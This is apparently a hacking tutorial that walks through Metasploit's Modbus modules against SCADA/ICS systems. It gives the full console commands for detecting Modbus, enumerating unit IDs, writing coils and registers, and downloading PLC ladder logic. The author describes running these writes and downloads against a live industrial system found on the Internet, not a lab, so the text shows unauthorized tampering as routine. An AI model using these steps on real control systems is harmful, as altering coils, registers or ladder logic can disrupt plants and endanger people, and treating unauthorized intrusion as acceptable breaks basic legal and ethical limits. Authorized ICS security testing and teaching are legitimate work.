Metasploit is widely recognized as a powerful tool to conduct penetration testing and hacking on traditional IT systems, but few people recognize that it also has capabilities within the more obscure--but increasingly important-- SCADA/ICS sector. Information security for SCADA/ICS is the next great frontier in our industry!
If you want to learn more about SCADA/ICS security and hacking, please see my section on SCADA Hacking available here.
SCADA/ICS systems use entirely different protocols from the traditional IT systems that utilize TCP/IP. These protocols are varied and were usually developed to communicate over serial media (RS485). As a result, the exploits in the SCADA/ICS industry are of an entirely different nature.
Metasploit has ported a number of auxiliary and exploit modules for SCADA/ICS. For a complete list, see this article here the SCADA Hacking section.
In this tutorial, we will focus on the most widely used SCADA/ICS protocol, modbus. Metasploit has a few modules specifically designed for reconnaissance and exploitation of this most widely used protocol. I will be using a live, functioning SCADA system as my target. This is not a laboratory or VM. It is random system selected from the Internet. I have removed it's IP address to protect the naive and uninformed. No damage was done and all settings were returned to their original state.
Step #1: Search for Modbus Modules
To begin, let's use the search function in Metasploit to find modbus modules.
msf > search modbus
As you can see above, we found five(5) modules all categorized as auxiliary. Sometimes these auxiliary modules in Metasploit actually have exploitation-like capabilities, as we will see here.
Let's load a module with a singular reconnaissance capability called modbusdetect. As it name implies, it is capable of detecting whether a site is running the modbus protocol. This would be the first step of reconnaissance and eventually, exploitation.
msf > use auxilary/scanner/scada/modbusdetect
This module only needs the user to set the IP address of the target as RHOST. The default port for modbus is 502, so the RPORT is set to 502 by default.
When we run this module, it goes to the target system's port 502 and sends a probe to determine whether it is using modbus. As you can see above, it confirms that our target is running modbus and now we can proceed with our modbus-based reconnaissance and exploitation.
Step #2: Find Unit ID's
Now that we have confirmed that the target is actually running the modbus protocol, the next step is to enumerate the Unit ID's of the connected devices. This is similar to a ping sweep in TCP/IP, but the results are slightly less reliable. Modbus allows for up to 254 connected devices. To manipulate or communicate with any modbus device, we must have its UNIT ID, not dissimilar to using IP addresses in TCP/IP.
msf > use auxilary/scanner/scanner/modbus_findunitid
Once again, for this module, the only variable we need to set is the RHOST.
msf > set RHOST <IP Address>
msf > exploit
As you can see, this module was successful in finding each of the Unit ID's of the connected devices. These UNIT ID's are critical for reading and writing their data, as we will see next.
Step #3: Reading and Writing the Modbus Devices
Our next modbus module is modbusclient. It enables us to read and write the data from both the coils and registers on these SCADA systems. Reading the data can lead to information leakage, but writing the data is even more nefarious as it could change various setting within the plant and cause a malfunction (pay attention cyber warriors!).
Let's load this module.
msf > use auxiliary/scanner/scada/modbusclient
This module requires several variables to be set. Most important is the ACTION. This variable can be set as;
1. READ_REGISTERS
2. WRITE_REGISTERS
3. READ_COILS
4. WRITE_COILS
Also note the default setting for the UNIT_NUMBER is 1 and NUMBER is 1. This means that by default, it will take its action only on the first UNIT ID and only the first unit. To increase the number of units the ACTION will act on, simply change the variable NUMBER. In this case, I set the NUMBER variable to 100. This means it will start with UNIT ID number 1 and read 100 registers.
As you can see in the screenshot above, we were able to read the values from the first 100 registers.
Next, let's try writing to the coils. In SCADA/ICS terminology, coils are devices on the network that are either ON or OFF. Their settings are either 1 or 0. By changing the values of a coil, you are switching it on or off.
First, we need to change the ACTION to WRITE_COIL.
msf > set ACTION WRITE_COIL
Next, set the DATA equal to 1(only 1 or 0 are valid values).
msf > set DATA 1
As you can see above, we successfully changed the value of the coil to 1! To check whether the value actually changed, we can now go back and read the coils.
msf > set ACTION READ_COILS
The value of the first coil was successfully set to 1 while all the others are still set to 0.
Now, let's try to change the values in the registers. These are memory areas that hold values used within the device to set such things as how long to run a pump or at what pressure should a valve open. Changing these values could have dire repercussions.
Let's first write the values in the registers.
msf > set ACTION WRITE_REGISTERS
Then, provide the data we want written to the registers. We set the data values by using the DATA variable and multiple values must be added separated by commas. In this case, let's add 5 (five) 27's to the first five registers.
msf> set DATA 27,27,27,27,27
After we hit exploit, Metasploit returns that 5 values have been written.
To check to see whether the values have actually changed, we can change the ACTION to READ_REGISTERS.
msf > set ACTION READ_REGISTERS
As you can see, the first 5 register value shave been changed to 27. This could be very dangerous!
Step #5 Download the PLC Ladder Logic
Within a SCADA/ICS network, PLC's are the brains behind the actions taking place inside the network. These small computers are programmed to control the devices connected to them. The software program is referred to as "Ladder Logic".
An attacker would likely want to download and analyze the PLC's ladder logic to illuminate what the PLC is controlling and how. By understanding the logic, values can then be changed that might have devastating impact on the facility. No one, but the administrator, should be able to view this logic.
Unfortunately, some administrators don't protect their ladder logic and make it available to anyone who tries to download it. It's worth noting that the famous malware Stuxnet did this before uploading new, destructive ladder logic to the Iranian uranium enrichment centrifuges.
Let's try to do this at our target facility.
The first step is to load the proper module.
msf > use auxiliary/admin/scada/modicon_stux_transfer
We only need toset our MODE variable to receive (RECV) and our RHOST to that of our target.
When we enter exploit, if the ladder logic is unprotected, it will begin to download the program as we successfully did.
Conclusion
Many industrial systems can be accessed and manipulated through some simple modbus modules in Metasploit. This manipulation of coils and registers has the potential for disastrous circumstances in the wrong hands. It is time for the SCADA/ICS industry to take security seriously before such dire circumstances take place!